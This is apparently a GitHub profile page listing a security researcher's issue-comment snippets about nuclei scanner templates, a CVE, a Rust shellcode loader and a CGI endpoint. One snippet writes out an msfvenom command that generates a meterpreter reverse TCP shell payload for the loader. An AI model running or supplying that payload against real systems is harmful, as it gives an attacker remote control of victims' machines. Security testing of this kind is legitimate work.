Sec13B

Results 53 comments of Sec13B

http/exposed-panels/fortinet/fortios-panel.yaml

I think is impossible to make template for this cve , the base address of libc is hard coded. rdi ,cmd,asdf these offsets are in libc and you dont know...

i cannot find this CVE? in cves folder

its only when i run ./nuclei if i run ./nuclei -l test.txt -t anycve.yaml -o vuln.txt show work

thank you

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ┌──(kali㉿kali)-[~/rust-shellcode] └─$ cargo build --release ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Downloaded either v1.8.1 Downloaded libloading v0.8.0 Downloaded memoffset v0.8.0 Downloaded autocfg v1.1.0 Downloaded scopeguard v1.1.0 Downloaded num_cpus v1.15.0 Downloaded crossbeam-deque v0.8.3 Downloaded...

replace w64-exec-calc-shellcode-func.bin with msf.bin same error. i use : msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 EXITFUNC=thread -f raw -o msf.bin

you can start with this : {target} /cgi-bin/skk_set.cgi

![Image](https://github.com/user-attachments/assets/13382041-75dd-4191-84a3-d89ac76a6ead) ![Image](https://github.com/user-attachments/assets/c881e2bf-e53a-4fb2-b793-02258dd37e42) ![Image](https://github.com/user-attachments/assets/f11e8039-3e02-48a9-9c4a-30b716199471) but the microsoft link : http://localhost:44569/................................

work if is same local network example (192.168.10.0/24) , if the subnets are different (192.168.10.0/24 and 10.10.10.0/24) , it doesnt work it is beautiful , it has new functions like...